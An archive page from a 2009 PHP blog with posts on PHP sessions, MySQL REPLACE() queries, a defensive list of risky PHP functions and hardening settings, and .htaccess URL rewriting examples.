Friday, February 27, 2009

Difference between session-register and $_SESSION in PHP

Difference between session-register and $_SESSION in PHP

 

I read in the help http://www.php.net/session_register that using $_SESSION[var]=value is better than using session_register. It is because session_register() only works if register_globals is set ON in your php.ini file, but for security purposes this has been disabled by default since PHP 4.2.0 You should therefore use $_SESSION['var'] instead.

at No comments:
Labels:

Wednesday, February 25, 2009

Using SELECT REPLACE with MySQL

I recently needed to compare the content of two columns in a MySQL database that stored the large and small images for a blog post. All the small ones start with "small" followed by a number and the large ones "big" followed by a number. Enter the REPLACE() function to get rid of small/large and do the comparison! In this post I show how to use the replace function in MySQL.

The REPLACE() function takes three parameters:

  1. the string or column name to do the replacement on
  2. what to look for
  3. and what to replace it with

The following example replaces the 'aaa' part of 'aaa bbb ccc' with 'xyz' and the column returned from the SQL query will contain 'xyz bbb ccc':

SELECT REPLACE('aaa bbb ccc', 'aaa', 'xyz');

If you were doing this against the column "foo" you would do this instead:

SELECT REPLACE(foo, 'aaa', 'xyz');

My example

In my case I had a column called 'image_small' and 'image_large' with example data like so:

+------------+--------------+-------------+
| content_id | image_small  | image_large |
+------------+--------------+-------------+
|          1 | small1.jpg   | big1.jpg    |
|         26 | small26.jpg  | big26.jpg   |
|         27 | small27.jpg  | big27.gif   |
|         24 | small24.jpg  | big24.jpg   |
|        419 | small208.gif | big419.gif  |
+------------+--------------+-------------+

I wanted to replace 'small' with an empty string and 'big' with an empty string in the select query, and then see if they were the same in each column. This can be done with the following query:

SELECT content_id,     REPLACE( image_small, 'small', '' ) AS image_small,     REPLACE( image_large, 'big', '' ) AS image_large FROM content

The resulting data looks like this:

+------------+-------------+-------------+
| content_id | image_small | image_large |
+------------+-------------+-------------+
|          1 | 1.jpg       | 1.jpg       |
|         26 | 26.jpg      | 26.jpg      |
|         27 | 27.jpg      | 27.gif      |
|         24 | 24.jpg      | 24.jpg      |
|        419 | 208.gif     | 419.gif     |
+------------+-------------+-------------+

Extending my example with IF()

The only problem with the above example is that I now need to scan every row and see which ones do and dont' match. The query can be extended with an IF() to output 1 or 0 if the filenames (without the small and big parts) match.

SELECT content_id,
  REPLACE(image_small, 'small', '') as image_small,
  REPLACE(image_large, 'big', '') as image_large,
  IF(REPLACE(image_small, 'small', '') = REPLACE(image_large, 'big', ''), 1, 0) AS matches
FROM content

This adds an extra column called "matches" which will display 1 if the two filenames match or 0 if they don't:

+------------+-------------+-------------+---------+
| content_id | image_small | image_large | matches |
+------------+-------------+-------------+---------+
|          1 | 1.jpg       | 1.jpg       |       1 |
|         26 | 26.jpg      | 26.jpg      |       1 |
|         27 | 27.jpg      | 27.gif      |       0 |
|         24 | 24.jpg      | 24.jpg      |       1 |
|        419 | 208.gif     | 419.gif     |       0 |
+------------+-------------+-------------+---------+

Now it's much easier to see which ones have the same filenames, once the 'small' and 'big' text has been removed by combining the REPLACE() and IF() MySQL functions.

at No comments:
Labels:

Tuesday, February 24, 2009

Holes in PHP applications

Holes in PHP applications
PHP Code Execution

* require() and include() - Both these functions read a specified file and interpret the contents as PHP code
* eval() - Interprets a given string as PHP code
* preg_replace() - When used with the /e modifier this function interprets the replacement string as PHP code

Command Execution

* exec() - Executes a specified command and returns the last line of the programs output
* passthru() - Executes a specified command and returns all of the output directly to the remote browser
* `` (backticks) - Executes the specified command and returns all the output in an array
* system() - Much the same as passthru() but doesn't handle binary data
* popen() - Executes a specified command and connects its output or input stream to a PHP file descriptor

File Disclosure

* fopen() - Opens a file and associates it with a PHP file descriptor
* readfile() - Reads a file and writes its contents directly to the remote browser
* file() - Reads an entire file into an array

Configuration

* Set register_globals off - This option will stop PHP creating global variables for user input. That is, if a user submits the form variable 'hello' PHP won't set $hello, only HTTP_GET/POST_VARS['hello']. This is the mother of all other options and is best single option for PHP security, it will also kill basically every third party application available and makes programming PHP a whole lot less convenient.
* Set safe_mode on - this introduces a large variety of restrictions including:
o The ability to restrict which commands can be executed (by exec() etc)
o The ability to restrict which functions can be used
o Restricts file access based on ownership of script and target file
o Kills file upload completely
This is a great option for ISP environments (for which it is designed) but it can also greatly improve the security of normal PHP environments given proper configuration. See the Safe Mode manual page for details.
* Set open_basedir This option prevents any file operations on files outside specified directories. This can effectively kill a variety of local include() and remote file attacks. Caution is still required in regards to file upload and session files.
* Set display_errors off, log_errors on This prevents PHP error messages being displayed in the returned web page. This can effectively limit an attackers exploration of the function of the script they are attacking. It can also make debugging very frustrating.
* Set allow_url_fopen off This stops remote files functionality. Very few sites really need this functionality.
at No comments:
Labels:

PHP Security

Check out this SlideShare Presentation:
PHP Security
View more presentations from manugoel2003. (tags: security php)
at No comments:

PHP Deployment With SVN

Check out this SlideShare Presentation:
PHP Deployment With SVN
View more presentations from Lorna Mitchell. (tags: dpc08 svn)
at No comments:

PHP and COM

Check out this SlideShare Presentation:
PHP and COM
View more presentations from Wez Furlong. (tags: php com)
at No comments:

Ajax 101 Workshop

Check out this SlideShare Presentation:
Ajax 101 Workshop
View more presentations from Bill Scott. (tags: scripthack mashup)
at No comments:

Monday, February 23, 2009

5 useful url rewriting examples using .htaccess.

If you are looking for the examples of URL rewriting then this post might be useful for you. In this post, I’ve given five useful examples of URL rewriting using .htacess. If you don’t know something about url rewriting then please check my older post about url rewriting using .htaccess.

Now let’s look at the examples

1)Rewriting product.php?id=12 to product-12.html

It is a simple redirection in which .php extension is hidden from the browser’s address bar and dynamic url (containing “?” character) is converted into a static URL.

RewriteEngine on
RewriteRule ^product-([0-9]+)\.html$ product.php?id=$1

2) Rewriting product.php?id=12 to product/ipod-nano/12.html

SEO expert always suggest to display the main keyword in the URL. In the following URL rewriting technique you can display the name of the product in URL.

RewriteEngine on
RewriteRule ^product/([a-zA-Z0-9_-]+)/([0-9]+)\.html$ product.php?id=$2

3) Redirecting non www URL to www URL

If you type yahoo.com in browser it will be redirected to www.yahoo.com. If you want to do same with your website then put the following code to .htaccess file. What is benefit of this kind of redirection?? Please check the post about SEO friendly redirect (301) redirect in php and .htaccess.

RewriteEngine On
RewriteCond %{HTTP_HOST} ^optimaxwebsolutions\.com$
RewriteRule (.*) http://www.optimaxwebsolutions.com/$1 [R=301,L]

4) Rewriting yoursite.com/user.php?username=xyz to yoursite.com/xyz

Have you checked zorpia.com.If you want to do redirection i.e http://yoursite.com/xyz to http://yoursite.com/user.php?username=xyz then you can add the following code to the .htaccess file.

RewriteEngine On
RewriteRule ^([a-zA-Z0-9_-]+)$ user.php?username=$1
RewriteRule ^([a-zA-Z0-9_-]+)/$ user.php?username=$1

5) Redirecting the domain to a new subfolder of inside public_html.

Suppose the you’ve redeveloped your site and all the new development reside inside the “new” folder of inside root folder.Then the new development of the website can be accessed like “test.com/new”. Now moving these files to the root folder can be a hectic process so you can create the following code inside the .htaccess file and place it under the root folder of the website. In result, www.test.com point out to the files inside “new” folder.

RewriteEngine On
RewriteCond %{HTTP_HOST} ^test\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.test\.com$
RewriteCond %{REQUEST_URI} !^/new/
RewriteRule (.*) /new/$1
at No comments:
Labels:
Subscribe to: Posts (Atom)

security header validate

  HTTP Security Headers Check Tool - Security Headers Response (serpworx.com)